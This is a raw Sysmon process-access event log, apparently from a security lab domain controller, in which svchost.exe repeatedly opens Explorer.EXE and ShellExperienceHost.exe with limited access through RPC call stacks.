07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 